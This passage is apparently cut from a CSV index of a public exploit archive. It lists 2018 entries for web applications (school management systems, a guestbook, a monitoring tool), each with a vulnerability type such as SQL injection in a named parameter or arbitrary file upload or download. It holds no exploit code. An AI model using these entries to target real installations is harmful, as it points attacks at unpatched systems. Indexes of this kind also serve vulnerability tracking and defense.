Visitor & Volunteer ID Tracking 0.95.1 - 'fname' SQL Injection",2018-10-22,"Ihsan Sencan",webapps,php, +45657,exploits/php/webapps/45657.txt,"Appsource School Management System 1.0 - 'student_id' SQL Injection",2018-10-23,"Ihsan Sencan",webapps,php, +45659,exploits/php/webapps/45659.txt,"SIM-PKH 2.4.1 - Arbitrary File Upload",2018-10-23,"Ihsan Sencan",webapps,php, +45661,exploits/windows/webapps/45661.txt,"ServersCheck Monitoring Software 14.3.3 - 'id' SQL Injection",2018-10-23,hyp3rlinx,webapps,windows, +45662,exploits/php/webapps/45662.txt,"School ERP Pro+Responsive 1.0 - Arbitrary File Download",2018-10-23,"Ihsan Sencan",webapps,php, +45663,exploits/php/webapps/45663.txt,"School ERP Pro+Responsive 1.0 - 'fid' SQL Injection",2018-10-23,"Ihsan Sencan",webapps,php, +45664,exploits/php/webapps/45664.txt,"SIM-PKH 2.4.1 - 'id' SQL Injection",2018-10-23,"Ihsan Sencan",webapps,php, +45665,exploits/windows/webapps/45665.txt,"MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection",2018-10-23,"Ihsan Sencan",webapps,windows,